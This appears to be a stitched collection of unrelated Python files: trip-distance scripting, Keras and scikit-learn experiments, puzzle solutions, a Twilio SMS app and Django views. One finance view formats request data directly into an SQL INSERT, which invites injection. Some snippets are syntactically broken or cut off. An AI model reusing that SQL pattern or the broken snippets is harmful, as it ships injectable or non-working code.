departure_name = ""
arrival_name = ""
elif (regex_home.match(line)):
home_name = line.split("=")[1].strip()
if (home_name not in addresses_book):
print("ERROR: Unknown address for " + home_name + " in " + file_name + " (line " + str(counter_global) + ")")
quit()
elif (regex_trip.match(line)):
counter_trip += 1
trip = line.split(">")
if day is None or month is None or year is None:
print("ERROR: You must first initialize a complete date (ex: 31/12/1970) in " + file_name)
quit()
if trip[0]:
departure_name = trip[0]
elif not departure_name and home_name:
departure_name = home_name
elif not departure_name:
print("ERROR: Incorrect departure in " + file_name + " (line " + str(counter_global) + ")")
quit()
if trip[1]:
arrival_name = trip[1]
elif home_name:
arrival_name = home_name
else:
print("ERROR: Incorrect arrival in " + file_name + " (line " + str(counter_global) + ")")
quit()
if departure_name == arrival_name:
print("ERROR: The departure and the arrival cannot be the same in " + file_name + " (line " + str(counter_global) + ")")
quit()
trip = departure_name + " > " + arrival_name
if (departure_name not in addresses_book):
print("ERROR: Address of " + departure_name + " is unknown in " + file_name + " (line " + str(counter_global) + ")")
quit()
elif (arrival_name not in addresses_book):
print("ERROR: Address of " + arrival_name + " is unknown in " + file_name + " (line " + str(counter_global) + ")")
quit()
else:
departure_address = addresses_book[departure_name]
arrival_address = addresses_book[arrival_name]
if (not distances_book or trip not in distances_book):
print("Calculation of " + trip + " using Google Maps API...")
results = gmaps.directions(
departure_address,
arrival_address,
mode = "driving",
departure_time = datetime.now().replace(hour=23),
alternatives = "true"
)
if (len(results) == 0):
print("ERROR: Google Maps couldn't calcute the distance of " + trip + " in " + file_name + " (line " + str(counter_global) + ")")
quit()
distance = None
for result in results:
result = result['legs'][0]['distance']['text'].split(" ")
new_distance = float(result[0])
unit = result[1]
if (unit == "m"):
new_distance = new_distance / 100
if (distance is None or new_distance < distance):
distance = new_distance
distances_book[trip] = distance
else:
distance = distances_book[trip]
sheet.write(counter_trip, 0, day + "/" + month + "/" + year)
sheet.write(counter_trip, 1, departure_address)
sheet.write(counter_trip, 2, arrival_address)
sheet.write(counter_trip, 3, line.replace("_", " ").replace(">", " > "))
sheet.write(counter_trip, 4, distance)
departure_name = arrival_name
elif (not regex_skip.match(line)):
print("ERROR: Unknown line format in " + file_name + " (line " + str(counter_global) + ")")
quit()
f.close()
# ---
# Save calculated distances
# ---
f = open(file_name_distances, "w")
if (distances_book):
for key, value in distances_book.items():
f.write(key + ": " + str(value) + "\n")
f.close()
print("Success !")
|
# Standup Bot by Christina Aiello, 2017-2020
import re
import random
from logger import Logger
# For logging purposes
def format_minutes_to_have_zero(minutes):
if minutes == None:
return "00"
else:
if(int(minutes) < 10):
return "0" + str(minutes)
else:
return str(minutes)
# Generate a random 6-digit code
def generate_code():
code = ""
for i in range (1, 7):
code += (str(random.randrange(10)))
return code
# Scheduler doesn't like zeros at the start of numbers...
# @param time: string to remove starting zeros from
def remove_starting_zeros_from_time(time):
return (re.search( r'0?(\d+)?', time, re.M|re.I)).group(1)
# Adds 12 if PM and not noon, else keeps as original time. When we insert
# data from the form into the database, we convert from AM/PM
# to 24-hour time.
def calculate_am_or_pm(reminder_hour, am_or_pm):
event_type = "CalculateAmOrPm"
Logger.log("Hour is: " + str(reminder_hour) + " and am or pm is: " + am_or_pm, Logger.info, event_type)
reminder_hour = int(reminder_hour)
if (am_or_pm == "pm" and reminder_hour != 12):
reminder_hour += 12
elif (am_or_pm == "am" and reminder_hour == 12):
reminder_hour = 0
Logger.log("Hour now is: " + str(reminder_hour) + " and am or pm is: " + am_or_pm, Logger.info, event_type)
return reminder_hour
|
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from keras.models import Sequential
from keras.layers import Dense , Dropout , Lambda, Flatten
from keras.optimizers import Adam ,RMSprop
from sklearn.model_selection import train_test_split
train = pd.read_csv("../datasets/train.csv")
test = pd.read_csv("../datasets/test.csv")
X_train = (train.ix[:,1:].values).astype('float32') # all pixel values
y_train = train.ix[:,0].values.astype('int32') # only labels i.e targets digits
X_test = test.values.astype('float32')
X_train = X_train.reshape(X_train.shape[0], 28, 28)
X_train = X_train.reshape(X_train.shape[0], 28, 28, 1)
X_test = X_test.reshape(X_test.shape[0], 28, 28, 1)
mean_px = X_train.mean().astype(np.float32)
std_px = X_train.std().astype(np.float32)
def standardize(x):
return (x-mean_px)/std_px
from keras.utils.np_utils import to_categorical
y_train= to_categorical(y_train)
num_classes = y_train.shape[1]
seed = 43
np.random.seed(seed)
from keras.models import Sequential
from keras.layers.core import Lambda , Dense, Flatten, Dropout
from keras.callbacks import EarlyStopping
from keras.layers import BatchNormalization, Convolution2D , MaxPooling2D
model= Sequential()
model.add(Lambda(standardize,input_shape=(28,28,1)))
model.add(Flatten())
model.add(Dense(10, activation='softmax'))
from keras.optimizers import RMSprop
model.compile(optimizer=RMSprop(lr=0.001),
loss='categorical_crossentropy',
metrics=['accuracy'])
from keras.preprocessing import image
gen = image.ImageDataGenerator()
from sklearn.model_selection import train_test_split
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=0.10, random_state=42)
batches = gen.flow(X_train, y_train, batch_size=64)
val_batches=gen.flow(X_val, y_val, batch_size=64)
history=model.fit_generator(batches, batches.n, nb_epoch=1,
validation_data=val_batches, nb_val_samples=val_batches.n)
history_dict = history.history
# history_dict.keys()
model.optimizer.lr=0.01
gen = image.ImageDataGenerator()
batches = gen.flow(X_train, y_train, batch_size=64)
history=model.fit_generator(batches, batches.n, nb_epoch=1)
predictions = model.predict_classes(X_test, verbose=0)
submissions=pd.DataFrame({"ImageId": list(range(1,len(predictions)+1)),
"Label": predictions})
submissions.to_csv("keras_way.csv", index=False, header=True) |
SECRET_KEY = '-dummy-key-'
INSTALLED_APPS = [
'pgcomments',
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
},
}
|
"""back URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from .views import HomeMobileView,MainView,HomeWxAuthView,ActivityView,ActivityDetailView,GrainView,GrainAddChildView,StageView,MyView,GrainOrderView
from .views import GrainEditChildView,GrainFeedbackView,GrainFeedbackNoteView
from .views import TMainClassMemberView,TMainAddClassView
from .views import TMyView
from .views import StLoginView
from .views import MyExitView
from .views import MyFriendsView
from .views import ShareFeedView
urlpatterns = [
url(r'^$', HomeMobileView.as_view(),),
url(r'^MP_verify_HAONGKquSEXIsxKN.txt$', HomeWxAuthView.as_view(),),
url(r'^stlogin$', StLoginView.as_view(),name="stlogin"),
url(r'^main$', MainView.as_view(),name="main"),
url(r'^main/activity/([t|h|n]{1})$', ActivityView.as_view(),name="main.activity"),
url(r'^main/activity/detail/.*$', ActivityDetailView.as_view(),name="main.activity.detail"),
url(r'^main/grain/order$', GrainOrderView.as_view(),name="main.order"),
url(r'^main/grain$', GrainView.as_view(),name="main.grain"),
url(r'^main/grain/addchild$', GrainAddChildView.as_view(),name="main.grain.addchild"),
url(r'^main/grain/editchild/.*$', GrainEditChildView.as_view(),name="main.grain.editchild"),
url(r'^main/grain/feednote/([0-9]+)$', GrainFeedbackNoteView.as_view(),name="main.grain.feedbacknote"),
url(r'^main/grain/feedback/([0-9]+)/([0-9]+)', GrainFeedbackView.as_view(),name="main.grain.feedback"),
url(r'^main/stage/([-1-9]+)', StageView.as_view(),name="main.stage"),
url(r'^main/my$', MyView.as_view(),name="main.my"),
url(r'^main/grain/friends$',MyFriendsView.as_view(),name="main.friends"),
url(r'^main/exit$', MyExitView.as_view(),name="main.myexit"),
url(r'^tmain/classmember/.*$', TMainClassMemberView.as_view(),name="tmain.classmember"),
url(r'^tmain/addclass/$', TMainAddClassView.as_view(),name="tmain.addclass"),
url(r'^tmain/my$', TMyView.as_view(),name="tmain.my"),
url(r'^share/([0-9]+)/([0-9]+)/([0-9]+)$', ShareFeedView.as_view(),name="share"),
]
|
import numpy as np
import pandas as pd
import clean_data
import pdb
import copy
class LogisticReg:
"""Implement Algorithm 1 from Descent-to-Delete"""
def __init__(self, theta, l2_penalty=.1):
self.l2_penalty = l2_penalty
self.theta = theta
self.constants_dict = {'strong': self.l2_penalty, 'smooth': 4 - self.l2_penalty, 'diameter': 2.0,
'lip': 1.0 + self.l2_penalty}
def gradient_loss_fn(self, X, y):
n = X.shape[0]
log_grad = np.dot(np.diag(-y/(1 + np.exp(y*np.dot(X, self.theta)))), X)
log_grad_sum = np.dot(np.ones(n), log_grad)
reg_grad = self.l2_penalty*self.theta
return (reg_grad + (1/n)*log_grad_sum)
def get_constants(self):
# must have ||theta|| <= 1
return self.constants_dict
def proj_gradient_step(self, X, y):
eta = 2.0/(self.constants_dict['strong'] + self.constants_dict['smooth'])
#eta = 0.5
current_theta = self.theta
grad = self.gradient_loss_fn(X, y)
# gradient update
#next_theta = copy.deepcopy(self.theta)-eta*grad
next_theta = current_theta - eta*grad
if np.sum(np.power(next_theta, 2)) > 1:
next_theta = next_theta/(clean_data.l2_norm(next_theta))
#if np.sum(self.theta == next_theta) == len(next_theta):
#pdb.set_trace()
# print('equal')
self.theta = next_theta
def predict(self, X):
probs = 1.0/(1+np.exp(-np.dot(X, self.theta)))
return pd.Series([1 if p >= .5 else -1 for p in probs])
if __name__ == "__main__":
X, y = clean_data.clean_communities(scale_and_center=True, intercept=True, normalize=True)
par = np.ones(X.shape[1])
par = par/clean_data.l2_norm(par)
model = LogisticReg(theta=par, l2_penalty=1.0)
model.gradient_loss_fn(par, X, y)
yhat = model.predict(X)
|
################################################################################
# Cristian Alexandrescu #
# 2163013577ba2bc237f22b3f4d006856 #
# 11a4bb2c77aca6a9927b85f259d9af10db791ce5cf884bb31e7f7a889d4fb385 #
# bc9a53289baf23d369484f5343ed5d6c #
################################################################################
# Problem 13049 - Combination Lock #
import sys
Fin = sys.stdin
NoCases = int(Fin.readline())
for CaseLoop in range(1, NoCases + 1):
NoWheels, StateInitial, StateTarget = Fin.readline().split()
Steps = 0
for WheelLoop in range(0, int(NoWheels)):
Diff = ord(StateInitial[WheelLoop]) - ord(StateTarget[WheelLoop]);
Steps = Steps + min((10 + Diff) % 10, (10 - Diff) % 10)
print("Case " + str(CaseLoop) + ": " + str(Steps)) |
import tensorflow as tf
from object_detection.utils import config_util
from object_detection.protos import pipeline_pb2
from google.protobuf import text_format
# Configurations des répertoires
WORKSPACE_PATH = 'boy_and_girl/workspace'
SCRIPTS_PATH = 'boy_and_girl/scripts'
APIMODEL_PATH = 'boy_and_girl/models'
ANNOTATION_PATH = WORKSPACE_PATH + '/annotations'
IMAGE_PATH = WORKSPACE_PATH + '/images'
MODEL_PATH = WORKSPACE_PATH + '/models'
PRETRAINED_MODEL_PATH = WORKSPACE_PATH + '/pre-trained-models'
CONFIG_PATH = MODEL_PATH + '/my_ssd_mobnet/pipeline.config'
CHECKPOINT_PATH = MODEL_PATH + '/my_ssd_mobnet/'
CUSTOM_MODEL_NAME = 'my_ssd_mobnet'
CONFIG_PATH = MODEL_PATH+'/'+CUSTOM_MODEL_NAME+'/pipeline.config'
# Configuration des libellés
labels = [
{'name': 'BOY', 'id': 1},
{'name': 'GIRL', 'id': 2}
]
with open(ANNOTATION_PATH + '/label_map.pbtxt', 'w') as f:
for label in labels:
f.write('item { \n')
f.write('\tname:\'{}\'\n'.format(label['name']))
f.write('\tid:{}\n'.format(label['id']))
f.write('}\n')
# Configuration du model
config = config_util.get_configs_from_pipeline_file(CONFIG_PATH)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
with tf.io.gfile.GFile(CONFIG_PATH, "r") as f:
proto_str = f.read()
text_format.Merge(proto_str, pipeline_config)
pipeline_config.model.ssd.num_classes = 2
pipeline_config.train_config.batch_size = 4
pipeline_config.train_config.fine_tune_checkpoint = PRETRAINED_MODEL_PATH+'/ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8/checkpoint/ckpt-0'
pipeline_config.train_config.fine_tune_checkpoint_type = "detection"
pipeline_config.train_input_reader.label_map_path= ANNOTATION_PATH + '/label_map.pbtxt'
pipeline_config.train_input_reader.tf_record_input_reader.input_path[:] = [ANNOTATION_PATH + '/train.record']
pipeline_config.eval_input_reader[0].label_map_path = ANNOTATION_PATH + '/label_map.pbtxt'
pipeline_config.eval_input_reader[0].tf_record_input_reader.input_path[:] = [ANNOTATION_PATH + '/test.record']
config_text = text_format.MessageToString(pipeline_config)
with tf.io.gfile.GFile(CONFIG_PATH, "wb") as f:
f.write(config_text)
# Affichage du PATH source qui va entraîner le model
print("""python {}/research/object_detection/model_main_tf2.py --model_dir={}/{} --pipeline_config_path={}/{}/pipeline.config --num_train_steps=2000""".format(APIMODEL_PATH, MODEL_PATH,CUSTOM_MODEL_NAME,MODEL_PATH,CUSTOM_MODEL_NAME))
|
"""Utilities functions."""
import pandas as pd
import torch as th
from pytoda.files import read_smi
from torch.utils.data import Dataset
class ProteinDataset(Dataset):
"""
Protein data for conditioning
"""
def __init__(
self, protein_data_path, protein_test_idx, transform=None, *args, **kwargs
):
"""
:param protein_data_path: protein data file(.smi or .csv) path
:param transform: optional transform
"""
# Load protein sequence data
if protein_data_path.endswith(".smi"):
self.protein_df = read_smi(protein_data_path, names=["Sequence"])
elif protein_data_path.endswith(".csv"):
self.protein_df = pd.read_csv(protein_data_path, index_col="entry_name")
else:
raise TypeError(
f"{protein_data_path.split('.')[-1]} files are not supported."
)
self.transform = transform
# Drop protein sequence data used in testing
self.origin_protein_df = self.protein_df
self.protein_df = self.protein_df.drop(self.protein_df.index[protein_test_idx])
def __len__(self):
return len(self.protein_df)
def __getitem__(self, idx):
if th.is_tensor(idx):
idx = idx.tolist()
sample = self.protein_df.iloc[idx].name
if self.transform:
sample = self.transform(sample)
return sample
|
# Default implementation of brute force KNN from Scipy
import numpy as np
from sklearn.neighbors import KNeighborsClassifier
from model import *
from util import split_train_test
import util
class default_knn:
samples = None
knn = None
scores = None
n = -1
k_max = -1
k_min = -1
def __init__(self, dataset, min_k, max_k):
self.samples = dataset
self.k_min = min_k
self.k_max = max_k
self.n = self.find_global_accuracies()
self.knn = KNeighborsClassifier(n_neighbors=self.n, algorithm='brute')
self.knn.fit(self.samples.get_X(), self.samples.get_y())
def find_global_accuracies(self):
scores = {}
ten_folds = self.samples.n_folds(10)
if self.k_max - self.k_min == 0:
return 1
for i in range(self.k_min, self.k_max):
global_accuracy = 0
for fold in range(0, len(ten_folds)):
test, train = util.split_train_test(ten_folds, fold)
temp_knn = KNeighborsClassifier(n_neighbors=i, algorithm='brute')
temp_knn.fit(train.get_X(), train.get_y())
score = temp_knn.score(test.get_X(), test.get_y())
global_accuracy += float(score)
global_accuracy /= 10
scores[i] = global_accuracy
result = util.sort_dict(scores, 1)
return result[0][0]
def get_score(self, dataset):
return self.knn.score(dataset.get_X(), dataset.get_y()), self.n
|
#Each element greater that the current element is shifted forward
def insertionSort(length,elements):
for i in range(0,length):
temp = elements[i]
j = i
#if the prev element is greater than temp, then is shifted forward
#and j is decremented
while(j > 0 and elements[j-1] > temp):
elements[j] = elements[j-1]
j = j-1
elements[j] = temp
return elements
def findXBinarySearch(min,max,x):
mid = min+max >> 1
if(x<result[mid]):
if(reverse):
return findXBinarySearch(mid+1,max,x)
return findXBinarySearch(min,mid-1,x)
if(x>result[mid]):
if(reverse):
return findXBinarySearch(min,mid-1,x)
return findXBinarySearch(mid+1,max,x)
else:
if(reverse):
return lenght-mid
else:
return mid+1
length = int(raw_input())
values = raw_input()
elements = [int(val) for val in values.split(" ")]
unordered = elements[:]
result = insertionSort(length,elements)
print result
reverse = result[0] > result[1]
for val in unordered:
print str(findXBinarySearch(0,length,val)),
|
from flask import Flask, request, redirect
import twilio.twiml
# Download the twilio-python library from http://twilio.com/docs/libraries
from twilio.rest import TwilioRestClient
# Find these values at https://twilio.com/user/account
account_sid = ""
auth_token = ""
client = TwilioRestClient(account_sid, auth_token)
app = Flask(__name__)
@app.route("/sendTexts", methods=['GET', 'POST'])
def sendTexts():
message = client.messages.create(to="+17345520988", from_="+14243320631",
body="Hello there! Text me back please :)")
message = client.messages.create(to="+12018355444", from_="+14243320631",
body="Hello there! Text me back please :)")
message = client.messages.create(to="+16148321908", from_="+14243320631",
body="Hello there! Text me back please :)")
message = client.messages.create(to="+15864847275", from_="+14243320631",
body="Hello there! Text me back please :)")
return "YO"
@app.route("/", methods=['GET', 'POST'])
def hello_monkey():
"""Respond to incoming calls with a simple text message."""
message = request.values.get('Body');
print message
resp = twilio.twiml.Response()
if(message == "start" or message == "Start"):
resp.message("Hello and Welcome to Podium! This is a tutorial for our new platform. Please respond to this message with '$test' to subscribe and recieve a test poll! If you would like to unsubscribe at any time, text \"Stop\" to this number.")
elif(message == "$test"):
resp.message("What is your favorite flavor of ice cream (Please respond with A, B, C, or D)?\nA. Chocolate\nB. Vanilla\nC. Strawberry\nD. Other")
else:
if(message == 'a' or message == 'A' or message == 'b' or message == 'B' or message == 'c' or message == 'C' or message == 'd' or message == 'D'):
resp.message("Thank you very much for your response! Have a great day :)")
else:
resp.message("Answer invalid. Please respond with A, B, C, or D.")
return str(resp)
if __name__ == "__main__":
app.run(debug=True) |
abc = int(input())
a = abc // 100
bc = abc - a * 100
b = bc // 10
c = bc - b * 10
sum = a + b + c
print(sum)
|
import setup
PATH, ERRORS = setup.check_permissions()
JAVAC = "{}{}".format(PATH, "/resources/ui/javac.ui")
|
#!/usr/bin/python
#-*- coding:utf-8 -*-
#**********************************************************
#Filename: 177_get_max_min.py
#Author: Andrew Wang - shuguang.wang1990@gmail.com
#Description: ---
#Create: 2016-11-02 01:10:09
#Last Modifieda: 2016-11-02 01:10:09
#*********************************************************
list_a = range(1,10)
print list_a
print max(list_a)
print min(list_a)
|
class Solution():
def isMatch(self, s, p):
# matched[i][j] is True if the first one is opened
matched = [[False for _ in range(len(p)+1] for _ in range(len(s)+1)]
matched[0][0] = True
for i in range(len(s)+1):
for j in range(1, len(p)+1):
pattern = p[j-1]
if pattern == '.':
matched[i][j] = (i != 0 and matched[i-1][j-1])
elif pattern == '*':
return result
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.viewsets import ViewSetMixin
from django.http import FileResponse
import pymysql, os, time
import datetime
from django import forms
from operator import itemgetter
from itertools import groupby
from settings import conf_fun
currency_dict = {'USD': 6.46,
'CAD': 5.06,
'GBP': 8.87,
'EUR': 7.78,
'MXN': 0.32,
'JPY': 0.061,
'AUD': 4.96}
class Withdrawal(ViewSetMixin, APIView):
def __init__(self):
self.ret = {'code': 200, 'msg': '无'}
def list(self, request):
dow_sql = "SELECT site,country,platform,currency FROM store_information "
re_data = conf_fun.connect_mysql_operation(dow_sql, type='dict')
re_dict = {}
for platform, items in groupby(re_data, key=itemgetter('platform')):
if platform not in re_dict:
re_dict[platform] = {}
for site, items_1 in groupby(items, key=itemgetter('site')):
if not re_dict[platform].get(site):
re_dict[platform][site] = []
for i in items_1:
re_dict[platform][site].append(
{'country': i.get('country'), 'currency': i.get('currency')})
self.ret['re_data'] = re_dict
return Response(self.ret)
def create(self, request):
# date = time.strftime("%Y-%m-%d %H:%M", time.localtime())
date = (datetime.datetime.now() + datetime.timedelta(minutes=8)).strftime("%Y-%m-%d %H:%M")
data = request.data
key_str = ""
value_str = ""
currency = data.get('currency')
if currency:
amount = data.get('amount')
x = currency_dict.get(currency)
if x:
payment_rmb = float(amount) * float(x)
key_str += "payment_rmb ,"
value_str += "'{0}' ,".format(payment_rmb)
for k, v in data.items():
if k in ['site', 'country', 'payment_account'] and v:
key_str += "{0} ,".format(k)
value_str += "'{0}' ,".format(v.strip())
elif k == 'platform' and v:
key_str += "{0} , source ,".format(k)
value_str += " '{0}' , '{0}' ,".format(v)
elif k == 'currency' and v:
key_str += "withdrawal_currency , payment_currency ,"
value_str += "'{0}' , '{0}' ,".format(v)
elif k == 'amount' and v:
key_str += "withdrawal_amount ,payment_amount ,"
value_str += "'{0}' , '{0}' ,".format(v)
key_str += " date,path,handling_fee,type"
value_str += "'{0}','P卡','0','2C'".format(date)
insert_sql = " INSERT INTO public_account ( {0}) values ({1})".format(key_str, value_str)
print(insert_sql)
conf_fun.connect_mysql_financial(insert_sql)
return Response(self.ret)
|
# Helpers
import copy
# Shapely **HAS** to be imported before anything else.
from shapely.geometry import mapping, shape
from shapely.prepared import prep
# Project configuration code
from geoplay.project import Project
# Data sources
from geoplay.data.zcta import ZCTA
from geoplay.data.stl_parks import StlParks
project = Project(
name="Nearby Parks",
output_dir='stl-parks',
projection='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs')
zcta = project.use(ZCTA)
parks = project.use(StlParks)
wanted_zips = zcta.filterTo(zipCodes=[63108, 63118, 63103, 63104, 63110])
for zip_area in wanted_zips:
# puff the bounds of the zip codes out 0.001 arcradians
loose_zip_bounds = shape(zip_area['geometry']).buffer(0.001)
# Make a list of parks that touch our new expanded ZIP
touching_parks = list(filter(
lambda p: loose_zip_bounds.intersects(shape(p['geometry'])),
parks.shapefile()))
# Update the geometry in the shapefile
zip_area['geometry'] = mapping(loose_zip_bounds)
# Write our variables
zip_area['properties']['PARKCOUNT'] = len(touching_parks)
zip_area['properties']['PARKNAMES'] = ', '.join([p['properties']['TEXT_'] for p in touching_parks ])
# Write out our final file
project.save_layer(
name='nearby-park-counts',
using_data=wanted_zips,
variables={
'ZCTA5CE10': {'type': 'str', 'from_data': 'ZCTA5CE10'},
'PARKCOUNT': {'type': 'int', 'from_data': 'PARKCOUNT'},
'PARKNAMES': {'type': 'str', 'from_data': 'PARKNAMES'},
})
project.save_csv(name='zip_parks', using_data=wanted_zips)
|
# 用urllib.request 代替原来的 urllib2
import urllib.request
url = "http://www.baidu.com"
#用urllib.request.urlopen() 代替 urllib2.urlopen()
response1 = urllib.request.urlopen(url)
#打印请求的状态码
print(response1.getcode())
#打印请求的网页内容的长度
print(len(response1.read()))
|
from django.urls import path
from employee.views import EmployeeListAPIView, AddEmployeeAPIView, EmployeeAPIView
urlpatterns = [
path('', AddEmployeeAPIView.as_view(), name='create-employee'),
path('<int:pk>', EmployeeAPIView.as_view(), name='employee-view'),
path('list', EmployeeListAPIView.as_view(), name='employee-list'),
]
|
n, a, b =map(int, input().split(" "))
counter = 0
for i in range(0,n+1):
li = map(int,list(str(i)))
s = sum(li)
if a <= s and s <= b:
counter = counter + i
print(counter) |
num_dict = {0:'', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five', 6:'six', 7:'seven', 8:'eight', 9:'nine',
10:'ten', 11:'eleven', 12:'twelve', 13:'thirteen', 14:'fourteen', 15:'fifteen', 16:'sixteen', 17:'seventeen', 18:'eighteen', 19:'nineteen',
20:'twenty', 30:'thirty', 40:'forty', 50:'fifty', 60:'sixty', 70:'seventy', 80:'eighty', 90:'ninety',
100:'hundred'}
def num(i):
if i < 20:
return num_dict[i]
elif i < 100:
if not i//10:
return num_dict[i]
else:
return num_dict[i//10*10]+' '+num_dict[i%10]
elif i < 1000:
temp = num_dict[i//100] + ' hundred'
if not i//100:
return temp
else:
return temp+' '+num(i%100)
return 'one thousand'
def secret_room(number):
num_list = []
goal = num(number)
for i in range(1,number+1):
num_list.append(num(i))
num_list.sort()
return num_list.index(goal)+1
if __name__ == '__main__':
secret_room(666)
print("Example:")
print(secret_room(5))
#These "asserts" using only for self-checking and not necessary for auto-testing
assert secret_room(5) == 1 #five, four, one, three, two
assert secret_room(3) == 2 #one, three, two
assert secret_room(1000) == 551
print("Coding complete? Click 'Check' to earn cool rewards!")
|
from .source_list import SourceListModel
from .appraiser_tx import AppraiserTexas
from .inspector_tx import InspectorTexas
from .real_estate_sales_agent_tx import RealEstateSalesAgentTexas
from .re_license_applicant_tx import RealEstateSalesAgentApplicantTexas
from .real_estate_sales_agent_ok import RealEstateSalesAgentOklahoma
|
import random
n = int(input())
mylist = []
for i in range(0,n):
mylist.append(random.randint(0,100000))
print(n)
for i in mylist:
print(i, end = " ")
|
# coding=utf-8
from .models import *
from django.http import HttpResponse
from django.contrib.auth import authenticate, login, logout
from django.views.decorators.http import require_http_methods
from django.core.files.base import ContentFile
import json
from .serializer import *
from .message_templates import send_application
from .utilities import send_message, authentication, cmp_to_key
from .tag import get_tag
from .feature import update_feature, similarity, compare_construct
'''
ger_user:
get user info by id
GET param
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| id | id of user | REQUIRED |
|===================================================================|
returns:
'state_code'
'user_info' -- when (state_code == 0)
'''
def get_user(request, id):
ret = dict()
try:
user = User.objects.get(id=id)
ret['user_info'] = user_serialize(user)
ret['state_code'] = 0
except User.DoesNotExist:
ret['state_code'] = 2
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
login_detail:
get user detail that is currently logged in
No params required
returns:
'state_code'
'user_info' -- when (state_code == 0)
'''
def login_detail(request):
ret = dict()
user = request.user
if not user.is_authenticated():
ret['state_code'] = 1
else:
ret['user_info'] = user_serialize(user)
ret['state_code'] = 0
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
update_user:
update user info(only by admin and user itself)
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
| name | name of user | No Default |
| intro | introduction of user | No Default |
| tags | tags of act (delimited by ',') | '' |
| cellphone | cellphone of user | No Default |
| fix_times | fix times of user | No Default |
| tmp_times | temp times of user | No Default |
|===================================================================|
returns:
'state_code'
'user_info' -- when (state_code == 0)
'''
@require_http_methods(['POST'])
def update_user(request):
ret = dict()
email = request.POST.get('email')
if not email:
ret['state_code'] = 4
elif not request.user.is_authenticated():
ret['state_code'] = 1
elif (not str(request.user.email) == email) and (not request.user.is_admin == True):
ret['state_code'] = 3
else:
try:
user = User.objects.get(email=email)
### update normal fields
editable_fields = [
'name',
'cellphone',
'intro',
'fix_times',
'tmp_times',
]
items = request.POST.items()
for (k, v) in items:
if k in editable_fields:
setattr(user, k, v)
### update tags
for tag in user.tags.all():
user.tags.remove(tag)
for tag in request.POST.get('tags', '').split(','):
user.tags.add(get_tag(tag.strip()))
user.save()
user.update_feature()
ret['state_code'] = 0
ret['user_info'] = user_serialize(user, False)
except User.DoesNotExist:
ret['state_code'] = 2
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
update_portrait:
update the portrait of a member
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| img(file) | portrait of user | REQUIRED |
|===================================================================|
'''
def update_portrait(request):
ret = dict()
r = authentication(request,
required_param=[],
require_authenticate=True)
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
else:
# file_content = ContentFile(request.FILES['img'].read())
print(123)
print(request.FILES)
user = request.user
user.portrait = request.FILES['file']
user.save()
ret['state_code'] = 0
ret['portrait_url'] = user.portrait.url
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
update_password:
update user password(only by admin and user itself), automatically
logout when succeeded
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
| password | password of user | REQUIRED |
|===================================================================|
returns:
'state_code'
'''
@require_http_methods(['POST'])
def update_password(request):
ret = dict()
email = request.POST.get('email')
if not email:
ret['state_code'] = 4
elif not request.user.is_authenticated():
ret['state_code'] = 1
elif not (str(request.user.email) == email or request.user.is_admin == True):
ret['state_code'] = 3
else:
try:
user = User.objects.get(email=email)
password = request.POST.get('password')
if not password:
ret['state_code'] = 5
else:
user.set_password(password)
ret['state_code'] = 0
user.save()
except User.DoesNotExist:
ret['state_code'] = 2
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
update_user:
delete user account(only admin and user itself)
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
|===================================================================|
returns:
'state_code'
'''
@require_http_methods(['POST'])
def delete_user(request):
ret = dict()
email = request.POST.get('email')
user = request.user
if not email:
ret['state_code'] = 4
elif not user.is_authenticated():
ret['state_code'] = 1
elif not (user.email == email or user.is_admin == True):
ret['state_code'] = 3
else:
try:
u = User.objects.get(email=email)
u.delete()
ret['state_code'] = 0
except User.DoesNotExist:
ret['state_code'] = 2
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
user_exist:
check if a email is used
GET params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
|===================================================================|
returns
'used'
'''
def user_exist(request, email):
ret = dict()
ret['used'] = (len(User.objects.filter(email=email)) > 0)
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
user_register:
register a new user
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
| password | password of user | REQUIRED |
| name | name of user | 'anonymous' |
| intro | introduction of user | '' |
| tags | tags of act (delimited by ',') | '' |
| cellphone | cellphone of user | '' |
| fix_times | fix times of user | 0 |
| portrait | user portrait(not implemented) | not implemented |
|===================================================================|
returns:
'state_code'
'user_info' -- when (state_code == 0 or state_code == 6)
'''
@require_http_methods(['POST'])
def user_register(request):
ret = dict()
if request.user.is_authenticated():
ret['state_code'] = 6
ret['user_info'] = user_serialize(request.user)
else:
user_info = dict()
user_info['name'] = request.POST.get('name', 'anonymous')
user_info['password'] = request.POST.get('password', '')
# user_info['portrait'] = request.POST.get('portrait')
user_info['email'] = request.POST.get('email', '')
# user_info['fix_times'] = request.POST.get('fix_times', 0)
# user_info['cellphone'] = request.POST.get('cellphone', '')
# user_info['intro'] = request.POST.get('intro', '')
